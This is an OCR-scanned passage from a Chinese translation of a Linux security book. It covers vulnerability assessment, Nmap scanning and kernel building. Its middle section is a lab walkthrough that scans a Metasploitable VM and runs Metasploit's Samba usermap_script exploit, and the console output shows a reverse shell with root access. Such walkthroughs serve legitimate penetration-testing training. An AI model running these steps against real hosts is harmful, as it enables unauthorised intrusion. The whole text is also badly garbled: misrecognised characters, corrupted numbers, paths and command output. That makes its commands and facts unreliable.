至 此 ， 你 已 经 成 功 配置 了 sudo 访 问 。 从 现在 开始 ， 你 可 以 登录 到 这 个 新 账号 ， 使 用 sudo 运 行 原来 只 有 root 用 户 才 能 使 用 的 


人 人 
HB X o 


原理 解析 


刚 开 始 创建 新 账号 时 ， 它 没有 运行 管理 员 命 令 的 权限 。 然 而 ， 通 过 编辑 /etc/sudoers 文 件 ， 为 新 账号 赋予 sudo 访 问 权 限 
后 ， 我 们 融 可 以 使 用 新 的 用 户 账号 来 运行 所 有 的 管理 员 售 令 了 。 


拓展 学 习 


还 有 一 个 额外 的 措施 可 以 用 来 确保 Linux 的 全 面 安 全 ， 这 就 是 脆弱 性 评估 。 


脐 弱 性 评估 是 对 网 络 和 系统 的 安全 进行 审计 的 过 程 ， 通 过 评估 可 以 了 解 网 络 的 保密 性 、 完 整 性 和 可 用 性 情况 。 脆 弱 性 评估 的 
第 一 阶段 是 侦察 ， 然 后 进入 系统 完好 性 (system readiness) 检查 阶段 ， 该 阶段 中 主要 检查 目标 中 是 否 存 在 已 知 的 漏洞 。 下 一 个 
阶段 是 形成 报告 ， 将 所 有 发 现 的 漏洞 按照 低 、 中 、 高 风险 进行 分 类 。 


1.9 使 用 Nmap 扫 描 主 机 


Nmap 是 Linux 中 一 个 流行 的 网 络 扫描 工具 。 它 已 经 出 现 了 很 多 年 ， 但 到 目前 为 止 , 仍然 是 收集 网 络 信息 的 最 好 工具 之 一 。 

管理 员 使 用 Nmap 可 以 发 现 网 络 中 任何 开放 的 端口 和 主机 系统 。 当 做 脆弱 性 评估 时 ，Nmap 肯 定 是 个 不 能 错过 的 工具 。 
准备 工作 

大 多 数 的 Linux 版 本 都 默认 安 站 了 Nmap。 所 以 ， 第 一 步 是 使 用 下 面 的 命令 检查 你 的 系统 中 是 否 已 经 有 了 该 工具 : 


nmap -version 


如 果 已 经 安装 了 Nmap， 那 么 你 应 该 看 到 类 似 如 下 所 示 的 输出 : 


La A - Ee A 
"RI FJ 目的 


://nmap.org ) 


/download.html 下 载 并 安装 它 。 


按照 如 下 步骤 使 用 Nmap 扫 拍 主 机 : 


1.Nmap 最 常见 的 用 途 是 查找 一 个 给 定 IP 泡 围 内 的 所 有 在 线 主 机 。 完 成 此 任务 的 默认 命令 需要 一 段 时 间 来 扫 摘 完整 网 络 ， 而 
时 间 的 长 短 取 决 于 网 络 中 存在 的 主机 数量 。 但 是 ， 我 们 可 以 优化 这 个 过 程 ， 以 便 更 快 地 扫 撞 指定 范围 。 


下 面 的 截图 向 你 展示 了 一 个 这 样 的 扫描 示例 : 
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2. 在 前 面 的 示例 中 ， 扫 朱 100 台 主机 所 需 的 时 间 为 6.67 秒 。 如 果 要 扫 摘 肝 特 定 网 络 的 整个 |P 泡 围 ， 则 可 能 需要 化 费 更 多 的 时 


[B], 


3. 现 在 ， 我 们 尝试 加 快 扫 摘 速 戎 。“-n” 开 关 告 许 Nmap 不 执行 |P 地 址 的 DNS 解析 ， 从 而 可 加 快 进 度 。 “-T” 开 关 告 诉 
Nmap 按 照 何 种 速度 进行 操作 。 其 中 ，T1 是 最 慢 的 ， 而 T5 是 最 快 的 。“--maxc-rtt-timeout ”选项 指定 等 待 响应 的 最 大 时 间 。 


现在 ,将 上 述 示 例 按 如 下 格式 执行 扫 摘 : 
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data files from: /usr/bin/../sh /nmap 
IP address (26 hosts u scanned in 


— R, Nmap TAIP ENAT 1.9785, JEZA, EIE? 
4. 使 用 Nmap 进 行 闯 口 扫 摘 能 帮助 我 们 发 现在 线 的 网 络 服务 ， 例 如 发 现 FTP 服 务 器 。 为 此 ， 使 用 以 下 命令 进行 端口 扫描 : 


| -PN -p21 


上 述 命令 将 列 出 所 有 已 打开 21 号 端口 的 IP 地 址 。 


5. 除 了 FTP， 其 他 服务 也 可 以 通过 运行 的 端口 号 来 发 现 。 例 如 ，MySQL 运 行 在 端口 3306， 要 发 现 MySQL 服 务 ， 可 使 用 如 下 


Nmap 通 过 测试 划 用 的 网 络 通信 闯 口 来 友 现 正在 监听 的 服务 。 扫 摘 获 取 的 信息 可 以 帮助 网 络 管 理 员 关闭 那些 不 需要 的 或 未 使 
用 的 服务 。 在 前 面 的 例子 中 ， 我们 展示 了 如 何 把 端口 扫 摘 和 Nmap 作 为 研究 网 络 的 有 力 工具 ，。 


Nmap 可 以 使 用 脚本 方式 运行 ， 用 户 可 以 编写 自 定义 的 脚本 。 使 用 脚本 有 助 于 Nmap 的 自动 化 并 扩展 其 扫描 功能 。 在 Nmap 
官方 主页 (https//nmap.org/) 上 ， 你 可 以 找到 更 多 有 关 的 信息 。 


当 我 们 希望 学 习 如 何 扫描 及 利用 Linux 机 器 时 ， 遇 到 的 一 个 主要 问题 就 是 从 哪里 能 学 习 这 些 知识 。 为 此 ，Metasploit 团 队 开 


友 并 上 友 布 了 一 个 名 为 Metasploitable 的 VMware 虚拟 机 。 这 个 虚拟 机 已 经 有 目的 地 内 置 了 一 些 漏洞 ， 许 多 运行 的 服务 都 没有 打 
补 J。 因 此 ， 它 是 一 个 用 于 实践 或 锻炼 渗透 测试 技能 的 很 好 的 平台 。 在 本 忆 中 ， 你 将 学 习 如 何 扫 摘 一 个 Linux 系 统 ， 然 后 利用 扫 
搞 结 果 找 到 一 个 脆弱 的 服务 ， 最 终 ， 利 用 这 个 脆弱 的 服务 获取 系统 的 root 访 问 权 限 。 


本 节 将 使 用 Backtrack 5R2 和 Metasploitable 虚 拟 机 系统 。Metasploitable 的 映像 文件 可 以 
Mhttp://sourceforge.net/projects/Metasploitable/files/Metasploitable2/ F8. 


按照 下 述 步骤 操作 获取 脆弱 Linux 系 统 的 root 访 问 权 : 
1. 首 先 ， 按 照 如 下 的 菜单 顺序 在 backtrack 系 统 中 打开 Metasploit 控 制 台 : 
Main Menu 一 Backtrack 一 Exploitation Tools Network Exploitation Tools 一 Metasploit Framework— Msfconsole 


2. 接 下 来 使 用 Nmap 扫 描 目标 主机 ， 本 例 中 目标 主机 的 地 址 是 192.168.0.1， 下 面 的 截图 显示 了 执行 命令 的 输出 结果 : 


msf > nmap -sS -Pn -A 192.168.8.1 
[*] exec: nmap -sS -Pn -A 192.168.8.1 


Starting Nmap 5.51SVN ( http://nmap.org ) at 2015-07-09 21:32 IST 
Nmap scan report for 192.168.8.1 
Host is up (8.80059s latency). 
Not shown: 988 closed ports 
STATE SERVICE VERSION 
open ftp ProFTPD 1.3.1 
open ssh OpenSSH 4.7p1 Debian 8ubuntul (protocol 2.8) 
1824 60:0f:cf:e1:c0:5f:6a:74:d6:98:24:fa:c4:d5:6c:cd (DSA) 


| 2048 56:56:24:08f:21:1d:de:a7:2b:ae:61:b1:24:3d:6e8:f3 (RSA) 
open telnet Linux telnetd 
open smtp Postfix smtpd 
open domain ISC BIND 9.4.2 
open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.18 with Suhosin-Ppatth) 
| http-title: Site doesn't have a title (text/html). 
| http-methods: Potentially risky methods: TRACE 
| See http://nmap.org/nsedoc/scripts/http-methods.html 
open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
3306/tcp open mysql MySQL 5.8.51a-3ubuntu5 
| mysql-info: Protocol: 18 
| Version: 5.8.51a-3ubuntu5 
| Thread ID: 13 
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection 
| Status: Autocommit 


| Salt: ,/HXwa S9«dbA[)Xa^2!K 

5432/tcp open postgresql PostgreSO0bmBB 8.2-]»- 8.3.4 
8809/tcp open a3$13? 

8180/tcp open Vhrtp Apache ?TomcatyCoy8te 32 sP- engine T 


前 述 命令 中 ，“-9s” 选 项 允许 我 们 执行 隐 菩 扫 摘 ，“-A” 选项 试图 友 现 操作 系统 和 服务 的 版 本 信息 。 
在 前 述 命 令 中 我 们 还 可 以 看 到 ， 有 许多 服务 在 不 同 的 端口 运行 。 其 中 ， 有 个 Samba 服 务 运行 在 端口 139 和 445。 


Sot: Samba 是 一 个 为 Windows 有 系统 提供 基于 SMB 协 议 的 文件 和 打印 共享 的 服务 。 


3 一 旦 找到 Samba 服 务 ， 我 们 将 专注 于 对 它 的 处 理 。 在 前 面 的 输出 中 可 以 看 到 ，Samba 当 前 运行 的 版 本 为 3.x。 下 面 我 们 试 
着 获取 关于 Samba 服 务 更 具体 的 信息 。 为 此 ， 使 用 Metasploit 的 辅助 模块 〈 如 扫 拉 器 部 分 ) 来 查找 SMB 协 议 。 


msf > search scanner/smb 


Disclosure Date Rank Description 


auxiliary/scanner/smb/pipe auditor normal Session Pipe Auditor 
auxiliary/scanner/smb/pipe dcerpc auditor normal Session Pipe DCERPC Auditor 
auxiliary/scanner/smb/smb2 normal 2.8 Protocol Detection 
auxiliary/scanner/smb/smb enumshares normal Share Enumeration 
auxiliary/scanner/smb/smb enumusers normal User Enumeration (SAM EnumUsers) 
auxiliary/scanner/smb/smb enumysers domain normal Domain User Enumeration 
auxiliary/scanner/smb/smb logi normal Login Check Scanner 


auxiliary/scanner/smb/smb looküpsid normal bitak Usem EpuneratiopsébocoMEpSid) 
auxiliary/scanner/smb/smb version normal vérsiongDetectiog 


msf » use auxiliary/scanner/smb/smb version 
msf auxiliary(smb versiom) > show options 


Module options (auxiliary/scanner/smb/smb version): 


Name Current Setting Required Description 


RHOSTS target address range or CIDR identifier 
SMBDomain  WORKGROUP Windows domain to use for authentication 
SMBPass password for the specified username 
SMBUser username to authenticate as 

THREADS number of concurrent threads 


auxiliary(smb version) » set RHOSTS 192. 
STS => 192.168.8.1 
auxiliary(smb version) » exploit 


[*] 192.168.0.1 :445 is running Unix Samba 3.0.28-Debian (language: Unknown) (domain:WORKGROUP) 
[*] Scanned 1 of 1 hosts (180* complete) 

[*] Auxiliary module execution completed 

msf auxiliary(smb version) > |l 


4. 可 以 看 到 ， 扫 描 器 部 分 有 一 个 SMB 版 本 探测 器 。 现 在 ， 将 使 用 SMB 探 测 器 程序 获取 Samba 准 确 的 版 本 信息 。 如 果 在 网 上 
搜索 Samba 特 定 版 本 的 漏洞 信息 ， 我 们 会 上 友 现 它 有 “用 户 名 映射 脚本 ” (username map script) 的 漏洞 。 


5. 现 在 ， 使 用 search samba 命 令 ， 搜 索 Metasploit 提 供 的 漏洞 利用 列表 ， 查 看 是 人 否 存在 用 户 名 映射 脚本 漏洞 的 利用 工具 : 


nsf > search samba 


Matching Modules 


losgre Date Rafik Descriptigh 


auxiliary/admin/smb/samba symlink traversal normal nba Symlink Directory Traversal 
auxiliary/dos/samba/lsa addprivs heap normal | lsa io privilege set Heap Overflow 
auxiliary/dos/samba/lsa transnames heap normal Samba lsa io trans names Heap Overflow 
exploit/freebsd/samba/trans20pen 2003-84-07 great ya trans2open Overflow (*BSD x86) 
exploit/linux/samba/chain reply 2818-86 - 1€ good Samba chain reply Memory Corruption (Linux x86) 
exploit/linux/samba/lsa transnames heap 2087 -85- good Samba lsa io trans names Heap Overflow 
exploit/linux/samba/trans2open 2003-04- great Samba trans2open Overflow (Linux x86) 
exploit/multi/samba/nttrans 2003-04- average 3 2.2.2 - 2.2.6 nttrans Buffer Overflow 
exploit/multi/samba/usermap script 2007-05- excellent Samba "username map script" Command Execution 
exploit/osx/samba/lsa transnames heap 2007-05- average amba lsa io trans names Heap Overflow 
exploit/osx/samba/trans2open 2883-84 - great S a trans2open Overflow (Mac OS X PPC) 
exploit/solaris/samba/lsa transnames heap 2087 -85- average Samba lsa io trans names Heap Overflow 
exploit/solaris/samba/trans2open 2003 - 84 - great Samba trans2open Overflow (Solaris SPARC) 
exploit/unix/misc/distcc exec 2082-82 - excellent DistCC Daemon Command Execution 
exploit/unix/webapp/citrix access gateway exec 2010-12- excellent Citrix Access Gateway Command Execution 
exploit/windows/http/sambar6 search results 2003 ] normal Sambar 6 Search Results Buffer Overflow 
exploit/windows/license/calicclnt getconfig 2005-03- average Computer Associates License Client GETCONFIG Overflow 
post/linux/gather/enum configs normal Linux Gather Configurations 


6. 我 们 皮 现 有 一 个 用 户 名 映射 脚本 的 漏洞 利用 工具 ， 它 的 评级 是 优秀 ， 这 意味 着 可 以 使 用 该 漏洞 利用 工具 。 


7. 现 在 ， 使 用 该 漏 洞 利用 工具 获取 目标 系统 中 root 用 户 的 shell。 


msf > use exploit/multi/samba/usermap script 
msf exploit(usermap script) » show options 


Module options (exploit/multi/samba/usermap script): 
Name Current Setting Required Description 
The target address 
The target port 
Exploit target: 
Id Name 
8 Automa Tie 
msf exploit (user pt) > set rhost 192.168.8.1 
rhost -» 192.168.8.1 
msf exploit(user* pt) » exploit 
Started reverse double handler 
*] Accepted the first client connection... 


*] Accepted the second client connection... 
Command: echo lefykUXQMFJP683g; 


*] writing to socket B 
Reading from sockets... 
Reading from socket B 


| 

| 

| 

| 

[*] writing to socket A 

| 

| 

| 

[*] B: "lefykUXQMFJP603gV rn" 


[*] Matching... 
[*] A is input... 


[*] Command shell session 1 opened (192.168.8.7 :4444 -> 192.168.8.1 :55629) at 2812-04-25 89:26:82 -0400 


1d 
uid-8(root) gid-8í(root) 


选 定 漏洞 利用 工具 并 设置 目标 主机 的 IP 地 址 ， 本 例 中 目标 地 址 是 192.168.0.1， 然 后 执行 利用 (exploit) 命令 。 命 令 执行 的 
结果 是 创建 一 个 与 目标 系统 的 远程 会 话 ， 同 时 打开 一 个 命令 shell。 现 在 ， 在 远程 shell 上 运行 “id” 命 令 ， 得 到 的 输出 结果 是 : 
uid=0 (root) gid=0 (root) 。 这 表示 我 们 已 经 拥有 了 对 目标 系统 的 远程 root 访 问 权限 。 


我 们 下 先 执行 Nmap 扫 摘 来 检查 正在 运行 的 服务 和 打开 的 闯 口 ， 友 现 Samba 服 务 正在 运行 。 然 后 ， 找 到 了 SMB 服 务 确 切 的 
版 本 信息 。 一 旦 得 到 这 些 信息 ， 束 搜索 可 用 的 9amba 漏 洞 利 用 工具 。 最 后 利用 该 工具 攻击 目标 系统 并 得 到 了 它 的 root shell. 


下 面 我 们 介绍 一 些 Linux 特 有 的 漏洞 利用 和 攻击 方式 。 


本 书 中 ， 我 们 将 浏览 一 些 Linux 常 见 的 漏洞 利用 和 攻击 ,但 不 包含 处 理 攻 击 的 任何 方法 。 本 市 的 目的 只 是 让 你 了 解 一 下 Linux 
中 弟 见 的 漏洞 利用 万 法 。 


很 多 情况 下 ， 管 理 员 会 使 用 供应 商 提 供 的 默认 口令 ， 甚 至 可 能 会 保留 空 口令 。 这 主要 友 生 在 配置 设备 (如 路 由 器 ) 以 及 配置 
BIOS 时 。 一 些 运 行 在 Linux 上 的 服务 也 包含 默认 管理 员 口 令 。 建 议 你 一 定 要 更 改 默 认 口 令 ， 设 置 一 个 新 的 、 只 有 管理 员 知道 的 口 
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， 这 融 是 IP 伪 委 。 有 各 种 工具 可 帮助 攻 


得 它 看 起 来 好 像 是 本 地 网 络 的 节操 


攻击 者 将 他 的 系统 连接 到 我 们 的 网 络 ， 并 伪 妆 起 来 ， 使 
击 者 进行 IP 伪 装 。 


en 
攻击 者 通过 窃听 可 以 收集 两 个 活跃 节点 间 通 过 网 络 传输 的 数据 。 这 种 类 型 的 攻击 对 很 多 协议 都 非常 有 效 ， 如 Telnet、FTP 和 
HTTP 等 。 当 远程 攻击 者 已 经 具有 对 网 络 中 某 个 系统 的 访问 权限 时 ， 就 可 以 进行 这 种 攻击 。 窃 听 还 可 以 通过 其 他 攻击 方法 实现 ， 


例如 中 间 人 攻击 。 
服务 脆弱 性 
如 果 攻 击 者 能 够 在 网 络 系统 上 运行 的 某 个 服务 中 友 现 一 个 漏洞 ， 那 么 他 们 可 以 攻击 整个 系统 及 数据 ， 长 全 包括 网 络 上 的 其 他 
系统 。 管 理 员 应 随时 关注 补丁 和 升级 情况 ， 及 时 更 新 网 络 系统 上 运行 的 所有 服务 和 应 用 程序 。 
合法 用 户 不 能 使 用 资源 ， 这 
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拒绝 服务 攻击 (DoS) 
当 攻 击 者 向 目标 系统 (如 服务 器 、 路 由 器 或 工作 站 ) 发 送 大 量 未 经 授权 的 数据 包 时 ， 可 


称 为 拒绝 服务 攻击 。 由 于 攻击 者 友 送 的 数据 包 通 常 是 伪造 的 ， 因 此 调查 DoS 攻 击 非 常 困 难 。 


scam ”配置 安全 且 优 化 的 内 核 


本 章 将 讨论 如 下 主题 : 
- 构建 并 使 用 内 核 的 要 求 
. 创建 USB 启 动 盘 
“ 获取 内 核 源 代码 
- 配置 并 构建 内 核 
“ S ELLE 
` 测试 和 调试 内 核 


使 用 Netconsole 配 置 调试 用 控制 台 


. 启动 时 调试 内 核 


Linux 的 所 有 友 行 版 本 ， 包 括 Ubuntu、CentOS 以 及 Fedora， 内 核对 它 来 说 都 至 天 重要 。 默 认 情 况 下 ， 大 多 数 Linux 友 行 版 


本 在 安 妆 操作 系统 时 都 安 丢 了 内 核 ， 因 此 通 弟 没 必要 编译 内 核 。 即 使 在 需要 安 半 内 核 的 天 键 更 新 时 ， 也 可 以 通过 Linux 系 统 的 
apt-get 或 yun 工 具 完 成 。 


然而 ， 确 实在 有 些 情 况 下 需要 我 们 自己 从 源 代码 开始 编译 内 核 。 例 如 下 面 这 些 情 况 束 需要 编译 内 核 : 
“启用 内 核 中 的 实验 特性 

“启用 新 硬件 支持 

. 调试 内 核 


` 研究 内 核 源 代码 


2.2 ”构建 并 使 用 内 核 的 要 来 


在 开始 构建 Linux 内 核 之 前 ， 必 须 确保 Linux 系 统 有 一 个 可 用 的 局 动 盘 。 当 引导 程序 的 配置 不 正确 时 ， 可 以 使 用 这 个 启动 盘 启 
动 Linux 系 统 。 本 章 ， 你 将 学 习 如 何 创建 一 个 USB 局 动 盘 ， 检 索 内 核 源 代码 ， 配 置 并 构建 内 核 ， 安 六 并 从 内 核 启动 。 


2.3 创建 USB 局 动 盘 


USB 局 动 盘 可 以 创建 在 任何 ext2、ext3 或 VFAT 格 式 的 USB 和 存储 设备 上 。 此 外 ， 需 要 确保 USB 设 备 有 足够 的 可 用 空间 。 所 需 
可 用 空间 的 大 小 随 发 行 映像 的 不 同 而 变化 ， 从 DVD 映 像 需要 的 4GB，CD 了 映像 需要 的 700MB， 到 最 小 局 动 介 质 映 像 需 要 的 
10MB, 


准备 工作 


在 执行 下 述 步 又 之 前 ,我 们 需要 有 一 个 Linux 安 装 盘 的 映像 文件 和 一 个 USB 和 存储 设备 ， 下 文中 ， 我 们 假设 映像 文件 叫 作 


boot.iso, 


操作 指南 
要 创建 USB 启 动 盘 ， 需 要 以 root 身 份 执行 如 下 命令 : 


1. 首 先 ， 执 行 下 述 命令 在 USB 存 储 设 备 上 安装 syslinux 的 启动 引导 程序 [1]: 


syslinux /dev/sdbl 


2. 现 在 ,分 别 为 boot.iso 文 件 和 和 USB 存储 设备 创建 挂 载 点 : 


mkdir /mnt/isoboot /mnt/diskboot 


3. 下 一 步 ， 把 boot.iso 文 件 挂 载 到 为 它 创建 的 挂 载 点 上 : 
mount -o loop boot.iso /mnt/isoboot 


其 中 ，“-o loop” 选 项 用 于 创建 一 个 伪 设 备 ， 使 其 像 块 设备 一 样 工作 。 该 命令 可 以 将 文件 视 为 块 设备 。 


4 接 下 来 ， 将 USB 存 储 设备 挂 载 到 为 它 创建 的 挂 载 点 上 : 
mount /dev/sdbl /mnt/diskboot 


5.boot.iso 和 USB 和 存储 设备 挂 载 成 功 后 ， 将 isolinux 中 的 所 有 文件 从 boot.iso 复 制 到 USB 和 存储 设备 上 : 


cp /mnt/isoboot/isolinux/* /mnt/diskboot 


6. 接 下 来 ， 运 行 如 下 命令 ， 将 boot.iso 中 的 isolinux.cfg 文 件 复制 为 USB 存 储 设备 上 的 syslinux.cfg 文 件 : 


grep -v local /mnt/isoboot/isolinux/isolinux.cfg > /mnt/diskboot/ 
syslinux.cfg 


7 98hpk Exhás S Im, tlskboot.isofIUSB£zli&ig $8 : 
unmount /mnt/isoboot /mnt/diskboot 
8. 现 在 ， 重 新 启动 系统 。 尝 试 使 用 USB 启 动 盘 ， 以 验证 它 能 否 用 来 启动 系统 。 


原理 解析 


当 我 们 从 boot.iso 复 制 所 需 的 文件 到 USB 存 储 介 质 ， 并 将 boot.iso 的 isolinux.cfg 文 件 复制 为 syslinux.cfg 文 件 时 ，USB 存 储 
设备 束 成 为 一 个 可 局 动 盘 ， 可 以 用 来 启动 Linux 系 统 了 。 
[1] 命令 中 的 sdb1 是 USB 设 备 的 第 一 个 分 区 。 安 装 USB 存 储 设备 后 ， 可 以 执行 命令 fdisk-1 列 出 本 机 的 磁盘 ， 查 看 USB 存 储 设备 的 分 


区 情况 。 译 者 注 


24 获取 内 核 源 代 码 


大 多 数 Linux 友 行 版 本 都 包 售 了 内 核 源 代码 。 然 而 ， 这 些 源 代码 可 能 有 点 过 时 了 。 所 以 ， 在 构建 或 者 定制 内 核 时 ， 我 们 可 能 
需要 获取 最 新 的 源 代码 。 


准备 工作 


大 多 数 Linux 内 核 开 发 者 社区 都 使 用 Git 工 具 来 管理 源 代码 。Ubuntu 甚 至 把 Git 集 成 到 了 自己 的 内 核 源 代码 中 ， 从 而 使 内 核 开 
发 人 员 能 更 好 地 与 社区 互动 。 


可 以 使 用 如 下 命令 安装 Git 软 件 包 : 


sudo apt-get install git 


操作 指南 
Linux 的 内 核 源 代码 可 以 从 各 种 来 源 下 载 ， 下 面 我 们 将 讨论 几 个 下 载 方法 : 


可 以 在 Linux 内 核 的 官网 主页 (http://www.kernel.org) 上 找到 完整 tar 包 形式 的 Linux 源 代码 以 及 增 量 补丁 包 。 


- 除非 你 有 什么 特殊 原因 必须 使 用 某 个 旧 的 版 本 ， 否 则 强烈 建议 你 使 用 最 新 版 。 


- Ubuntu 的 内 核 源 代码 可 以 在 Git 下 找到 。 内 核 的 每 个 发 行 版 都 独立 保存 在 kernel.ubuntu.com 上 各 自 的 Git 资 源 库 中 ， 地 址 


为 : 
git://kernel.ubuntu.com/ubuntu/ubuntu- « release» .git 
B &http://kernel.ubuntu.com/git-repos/ubuntu/ 
这 里 的 <release> 指 Ubuntu 版 本 的 开发 代号 ， 如 下 图 命令 中 的 “precise”。 
:我们 可 以 使 用 Git 的 克隆 命令 将 代码 库 在 本 地 克隆 一 份 。 克 隆 命令 随 着 Ubuntu 版 本 的 不 同 而 有 所 变化 。 
-为 获得 Ubuntu Precise 版 本 的 代码 树 : 1 ， 可 执行 下 面 截图 中 所 示 的 命令 : 
rootükali:-£€ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-precise.git 
Cloning into 'ubuntu-precise'... 
remote: Counting objects: 3833225, done. 
remote: Compressing objects: 100% (57/78669/578669), done. 
Receiving objects: 05 (90/3/3833225]), 2.02 MiB | 55 KiB/s 
要 下 载 任何 其 他 版 本 的 代码 树 ， 命 令 语 法 格式 如 下 : 
git clone git://kernel.ubuntu.com/ubuntu/ubuntu-«release». 
下 载 的 文件 是 GNU zip 格 式 (.gzip 格 式 ) 或 .bzib2 格 式 丫 。 文 件 下 载 后 ， 需 要 将 它 解压 缩 。 如 果 tar 包 是 bzibp2 格 式 ， 请 使 用 如 
下 命令 : 


tar xv]r linux-x.y.z.tar.bz2 


如 果 是 GNU zip 格 式 ， 则 使 用 如 下 命令 : 


tar xvzf linux-x.y.z.tar.gz 


原理 解析 


使 用 上 述 不 同方 法 都 可 以 下 载 到 Linux 内 核 的 源 人 代码。 选择 哪 种 方法 取决 于 用 户 的 选择 和 偏好 。 
[1] 根据 Ubuntu 的 开发 代号 命名 ，Ubuntu 12.04 的 开发 代号 是 Precise Pangolin。 本 例 中 的 ubuntu-precise.git 就 是 下 载 这 个 版 本 的 源 代 
Ab. 译 者 注 


[2] GNU zip 格 式 文件 的 扩展 名 为 .gz， 而 bzip2 格 式 文件 的 扩展 名 为 .bz2。 


2.5 ”配置 并 构建 内 核 


有 许多 原因 导致 需要 配置 内 核 。 比 如 ， 我 们 想 调 整 内 核 的 大 小 从 而 只 运行 必要 的 服务 ， 或 者 必须 打 补 丁 以 使 内 核 支 持原 来 没 
有 的 新 硬件 。 这 对 任何 系统 管理 员 来 说 都 是 个 艰巨 的 任务 。 本 节 中 ， 我 们 将 了 解 如 何 配 置 及 构建 内 核 。 


准备 工作 


建议 在 系统 的 局 动 分 区 为 内 核 留 有 足够 的 空间 。 可 以 选择 整个 磁盘 安 疼 选项 ， 或 者 为 局 动 分 区 留 出 至 少 3GB 的 磁盘 空间 。 
安 妆 Linux 友 行 版 本 ， 并 配置 好 系统 上 的 开 友 包 之 后 ， 局 用 root 账 号 ， 同 时 为 普通 用 户 账 号 配置 sudo 权限 。 


现在 ， 在 安 妆 任何 软件 包 之 前 ， 请 运行 以 下 命令 更 新 系统 : 
sudo apt-get update && sudo apt-get upgrade 
命令 执行 完 后 ， 请 检查 编译 基础 包 (build-essential package) 是 否 已 安装 。 如 果 没有 ， 可 以 使 用 以 下 命令 安装 它 : 


sudo apt-get install build-essential 


这 个 包 用 于 在 x86 _ 64 系统 上 编译 Linux 内 核 。 
我 们 还 需要 一 些 其 他 工具 来 编译 内 核 : 


应 该 安装 最 新 版 本 的 gcc。 可 以 使 用 如 下 命令 安装 最 新 版 本 的 gcc: 
sudo apt-get install gcc 


- 使 用 如 下 命令 安装 ncutses 开 发 包 : 


sudo apt-get install libncursesb5-dev 
“ 还 需要 一 些 其 他 软件 包 来 交叉 编译 Linux 内 核 : 


sudo apt-get install binutils-multiarch 
sudo apt-get install alien 


- 下 一 步 ， 安 装 ncufses-dev， 运 行 make menuconfig 时 需要 用 到 它 : 


sudo apt-get install ncurses-dev 


操作 指南 
完成 准备 阶段 的 步骤 之 后 ， 我 们 束 可 以 继续 配置 和 构建 内 核 的 过 程 了 。 这 个 过 程 需要 的 时 间 较 长 ， 所 以 要 做 好 准备 : 


1. 访 问 http://www.kernel.org 网 站 ， 如 下 图 所 示 ， 下 载 Linux 内 核 。 


The Linux Kernel Archives 


About Contact us FAQ Releases Signatures Site news 

Protocol Location 

HTTP https://www.kerneLorg/pub/ 

GIT https://git.kerneLorg/ 

RSYNC rsync://rsync.kerneLorg/pub/ 
mainline: | 4.2-rc6 2015-08-09 [tar.xz] [pap] [patch] [view diff] [browse] 
stable: 4.1.5 2015-08-10 [tar.xz] [pop] [patch] [inc. patch] [view diff] [browse] [changelog] 
stable: 4.0.9 [FOL] 2015-07-21 [tar.xz] [pap] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.18.20 2015-08-08 [tar.xz] [pop] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.14.50 2015-08-10 [tar.xz] [pap] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.12.46 2015-08-07 [tar.xz] [pop] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.10.86 2015-08-10 [tar.xz] [pop] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.4.108 2015-06-19 [tar.xz] [pap] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 3.2.71 2015-08-12 [tar.xz] [pap] [patch] [inc. patch] [view diff] [browse] [changelog] 
longterm: 2.6.32.67 2015-06-03 [tar.xz] [pap] [patch] [inc. patch] [view diff] [browse] [changelog] 
unux-next next-20150814 2015-08-14 [browse] 


2. 也 可 以 使 用 如 下 命令 下 载 : 


wget https://www.kernel.org/pub/linux/kernel/v4.x/linux-4.1.5.tar. 
XZ 


root@kali:~# wget https://www.kernel.org/pub/linux/kernel/v4.x/linux-4.1.5.tar.xz 
- -2015-10-28 11:05:23-- https://www.kernel.org/pub/Linux/kernel/v4.x/Linux-4.1.5.tar.xz 
Resolving www.kernel.org (www.kernel.org)... 199.204.44.194, 198.145.20.140, 149.20.4.69, .. 


Connecting to www.kernel.org (www.kernel.org)|199.204.44.194|:443... connected. 
HTTP request sent, awaiting response... 200 OK 

Length: 83025368 (79M) [application/x-xz] 

Saving to: '"linux-4.1.5.tar.xz' 


0835 [ 


] 502,360 95.2K/s 


3. 下 载 完 成 后 ， 切 换 到 保存 下 载 文 件 的 目录 。 


4. 如 果 下 载 的 文件 保存 在 Downloads 文 件 夹 中 ， 则 执行 以 下 命令 : 


root@kall:~# cd Downloads/ 
rootükali:-/Downloads£ 国 


5. 现 在 ， 使 用 下 述 命令 将 下 载 后 的 .tar 广 件 解压 到 /usrsrc/ 位 置 : 


oot(ükali: 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 
inux-4. 


-— xx 


-/Downloads£ tar -xvf linux-4.1.6.tar.xz -C /usr/src/ 


.6/ 

.6/.gitignore 

.6/ .mailmap 

.6/COPYING 

.S/CREDITS 

.6/Documentation/ 

.6/Documentation/O00-INDEX 

.6/Documentation/ABI/ 

.6/Documentation/ABI/README 

.5/Documentation/ABI/obsolete/ 
.5/Documentation/ABI/obsolete/proc-sys-vm-nr pdflush threads 
.6/Documentation/ABI/obsolete/sysfs-block-zram 
.6/Documentation/ABI/obsolete/sysfs-bus-usb 
.6/Documentation/ABI/obsolete/sysfs-class-rfkill 
.5/Documentation/ABl/obsolete/sysfs-driver-hid-roccat -koneplus 
.6/Documentation/ABI/obsolete/sysfs-driver-hid-roccat-kovaplus 
.6/Documentation/ABI/obsolete/sysfs-driver-hid-roccat-pyra 


6. 使 用 如 下 命令 切换 到 解压 所 创建 的 目录 : 


eta 14m 40s 


root@kali:~/Downloads# cd /usr/src/linux-4.1.6/ 
rootükali:/usr/src/linux-4.1.64 f 


7. 运 行 如 下 命令 准备 配置 Linux 内 核 ， 为 后 续 的 编译 和 安装 做 准备 : 


:—-./linux-4.1.62 make menuconfig 
